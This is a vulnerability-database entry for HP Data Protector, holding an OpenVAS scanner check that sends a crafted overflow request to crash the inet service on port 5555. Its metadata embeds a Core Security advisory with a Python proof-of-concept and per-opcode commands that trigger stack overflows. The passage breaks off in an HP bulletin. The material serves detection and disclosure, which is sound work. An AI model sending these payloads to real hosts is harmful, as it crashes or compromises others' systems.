HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities
2011-07-01T00:00:00
ID OPENVAS:1361412562310902454 Type openvas Reporter Copyright (c) 2011 SecPod Modified 2018-09-17T00:00:00
Description
This host is installed with HP (OpenView Storage) Data Protector and is prone to
multiple remote code execution vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_hp_data_protector_mult_code_exec_vuln.nasl 11421 2018-09-17 06:58:23Z cfischer $
#
# HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (c) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
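CPE = "cpe:/a:hp:data_protector";

# NVT registration pass: only metadata is set here and the script exits,
# so nothing below this block runs when `description` is set.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.902454");
  script_version("$Revision: 11421 $");
  script_tag(name:"last_modification", value:"$Date: 2018-09-17 08:58:23 +0200 (Mon, 17 Sep 2018) $");
  script_tag(name:"creation_date", value:"2011-07-01 16:09:45 +0200 (Fri, 01 Jul 2011)");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_cve_id("CVE-2011-1865", "CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1866");
  script_bugtraq_id(48486);
  script_name("HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities");
  # ACT_DENIAL: the probe below may crash the target service, so the scanner
  # schedules it with the other potentially disruptive checks.
  script_category(ACT_DENIAL);
  script_copyright("Copyright (c) 2011 SecPod");
  script_family("General");
  # Relies on the detection NVT having found the product and recorded its port.
  script_dependencies("hp_data_protector_installed.nasl");
  script_require_ports("Services/hp_dataprotector", 5555);
  script_mandatory_keys("hp_data_protector/installed");

  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/17458/");
  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2011/Jun/552");
  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2011/Jun/551");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute
arbitrary code and lead to denial of service conditions.");

  script_tag(name:"affected", value:"HP (OpenView Storage) Data Protector 6.20 and prior.");

  # Wording fixed: the original text read "service, command. which allows
  # remote remote attackers", a garbled sentence with a duplicated word.
  script_tag(name:"insight", value:"Multiple flaws are due to errors in the 'data protector inet' service
command handling, which allow remote attackers to execute arbitrary code.");

  script_tag(name:"summary", value:"This host is installed with HP (OpenView Storage) Data Protector and is prone to
multiple remote code execution vulnerabilities.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");

  script_tag(name:"solution_type", value:"WillNotFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}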
include("host_details.inc");
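if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
get_app_location( cpe:CPE, port:port, nofork:TRUE ); # To have a reference to the Detection NVT within the GSA

# Returns TRUE when `data` contains one of the greetings the Data Protector
# inet service presents on a fresh connection, FALSE for an empty/NULL reply.
# Shared by the baseline check and the post-probe check so both apply the
# same criterion.
function has_dp_banner( data ) {
  if( ! data ) return FALSE;
  if( "HP Data Protector" >< data ) return TRUE;
  if( "HPE Data Protector" >< data ) return TRUE;
  if( "HP OpenView Storage Data Protector" >< data ) return TRUE;
  return FALSE;
}

# Baseline: the verdict at the end is "no greeting after the probe => the
# service crashed or hung", which assumes the service greets on connect
# before any data is sent. Confirm that holds right now; otherwise a host
# whose inet service is already down or silent would be reported as
# vulnerable (false positive).
soc = open_sock_tcp( port );
if( ! soc ) exit( 0 );
baseline = recv( socket:soc, length:4096, timeout:20 );
close( soc );
if( ! has_dp_banner( data:baseline ) ) exit( 0 );

# Fresh connection for the probe so the request is the first thing sent on
# that socket, exactly as in the original flow.
soc = open_sock_tcp( port );
if( ! soc ) exit( 0 );

# Request from the referenced public PoC: a fixed header, a 10001-byte filler
# of 0x61, and a fixed trailer. The bytes are kept verbatim.
headdata = raw_string( 0x00, 0x00, 0x27, 0xca, 0xff, 0xfe, 0x32,
                       0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
                       0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
                       0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
                       0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
                       0x00, 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x00,
                       0x00, 0x20, 0x00 );

middata = crap( data:raw_string( 0x61 ), length:10001 );

lastdata = raw_string( 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
                       0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
                       0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
                       0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
                       0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
                       0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
                       0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
                       0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
                       0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
                       0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
                       0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
                       0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
                       0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
                       0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
                       0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
                       0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
                       0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
                       0x00, 0x61, 0x00, 0x00, 0x00 );

req = headdata + middata + lastdata;

send( socket:soc, data:req );
close( soc );

# Give the service time to crash or hang before it is re-checked.
sleep( 5 );

# Post-probe check: a refused connection, or a connection that no longer
# greets, means the service did not survive the request.
soc = open_sock_tcp( port );
if( ! soc ) {
  security_message( port:port );
  exit( 0 );
}

response = recv( socket:soc, length:4096, timeout:20 );
close( soc ); # always release the socket, also on the vulnerable path
if( ! has_dp_banner( data:response ) ) {
  security_message( port:port );
  exit( 0 );
}

# 99: checked and found not vulnerable (OpenVAS convention).
exit( 99 );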
{"id": "OPENVAS:1361412562310902454", "type": "openvas", "bulletinFamily": "scanner", "title": "HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities", "description": "This host is installed with HP (OpenView Storage) Data Protector and is prone to\n multiple remote code execution vulnerabilities.", "published": "2011-07-01T00:00:00", "modified": "2018-09-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902454", "reporter": "Copyright (c) 2011 SecPod", "references": ["http://seclists.org/fulldisclosure/2011/Jun/551", "http://www.exploit-db.com/exploits/17458/", "http://seclists.org/fulldisclosure/2011/Jun/552"], "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1866"], "lastseen": "2019-05-29T18:39:36", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1865", "CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1866"]}, {"type": "nessus", "idList": ["HP_DATA_PROTECTOR_0620_MULTIPLE_VULNS_CREDS.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26622", "SECURITYVULNS:VULN:11768", "SECURITYVULNS:DOC:26620", "SECURITYVULNS:DOC:26621"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102732", "PACKETSTORM:102673", "PACKETSTORM:102746", "PACKETSTORM:102677"]}, {"type": "seebug", "idList": ["SSV:71826", "SSV:71823"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:00DB1608EA05836AAFE73947E6790FBA", "EXPLOITPACK:357E2A5253FECAF999A26172A2781370"]}, {"type": "saint", "idList": ["SAINT:58795E132074156A75A962B77A5E7B84", "SAINT:C5838FC8C5DFFAC4C8B6A54D44AF1F95", "SAINT:1A7CE71BAD720EA2DC8BE64DC4A90616", "SAINT:BE1843E272D1C58DB8EE87EEE629BCF9", "SAINT:BFECBBFEF0FF935EC2948195CF6FCA20", "SAINT:06C6A95370F0B8116A7243D809437C0C"]}, {"type": "exploitdb", "idList": ["EDB-ID:17468", "EDB-ID:17458", "EDB-ID:17461", "EDB-ID:17490", "EDB-ID:17467"]}, {"type": "metasploit", "idList": 
["MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_4", "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_3"]}], "modified": "2019-05-29T18:39:36", "rev": 2}, "score": {"value": 10.0, "vector": "NONE", "modified": "2019-05-29T18:39:36", "rev": 2}, "vulnersScore": 10.0}, "pluginID": "1361412562310902454", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hp_data_protector_mult_code_exec_vuln.nasl 11421 2018-09-17 06:58:23Z cfischer $\n#\n# HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:data_protector\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902454\");\n script_version(\"$Revision: 11421 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-17 08:58:23 +0200 (Mon, 17 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-01 16:09:45 +0200 (Fri, 01 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-1865\", \"CVE-2011-1514\", \"CVE-2011-1515\", \"CVE-2011-1866\");\n script_bugtraq_id(48486);\n script_name(\"HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"hp_data_protector_installed.nasl\");\n script_require_ports(\"Services/hp_dataprotector\", 5555);\n script_mandatory_keys(\"hp_data_protector/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17458/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Jun/552\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Jun/551\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code and lead to denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"HP (OpenView Storage) Data Protector 6.20 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to error in 'data protector inet' service,\n command. 
which allows remote remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with HP (OpenView Storage) Data Protector and is prone to\n multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_location( cpe:CPE, port:port, nofork:TRUE ); # To have a reference to the Detection NVT within the GSA\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\nheaddata = raw_string( 0x00, 0x00, 0x27, 0xca, 0xff, 0xfe, 0x32,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x00,\n 0x00, 0x20, 0x00 );\n\nmiddata = crap( data:raw_string( 0x61 ), length:10001 );\n\nlastdata = raw_string( 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 
0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00 );\n\nreq = headdata + middata + lastdata;\n\nsend( socket:soc, data:req );\n\nclose( soc );\n\nsleep( 5 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) {\n security_message( port:port );\n exit( 0 );\n} else {\n response = recv( socket:soc, length:4096, timeout:20 );\n if( \"HP Data Protector\" >!< response && \"HPE Data Protector\" >!< response && \"HP OpenView Storage Data Protector\" >!< response ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\nclose( soc );\n\nexit( 99 );", "naslFamily": "General"}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1866"], "description": "Multiple vulnerabilities in TCP/5555 service.", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:VULN:11768", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11768", "title": "HP OpenView Storage Data Protector multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. 
The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the "data protector inet" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. 
*Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join(["%s\x00" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = ["\xff\xfe\x32\x00\x00\x00"]\r\n\r\nfor s in args:\r\n packet.append("\x20\x00" + s + "\x00\x00")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(">L", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 10000 30 17"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. 
Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 42 10000 30 9"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 46 10000 30 17"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 27 10000 30 3"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerabilidad 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 17 10000 30 6"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. 
Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 1 7 6"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 20 1 7 6"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. 
Publication date is temporarily set to July 5th, 2011.\r\n\r\n 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n 2011-06-23:\r\nCore requests once more an update.\r\n\r\n 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. 
We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26621", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26621", "title": "CORE-2011-0514: Multiple vulnerabilities in HP Data Protector", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1865", "CVE-2011-1866"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02872182\r\nVersion: 3\r\n\r\nHPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-06-28\r\nLast Updated: 2011-06-29\r\n\r\n -------------------------------------------------------------------------------\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities has been identified with HP OpenView Storage Data\r\nProtector. 
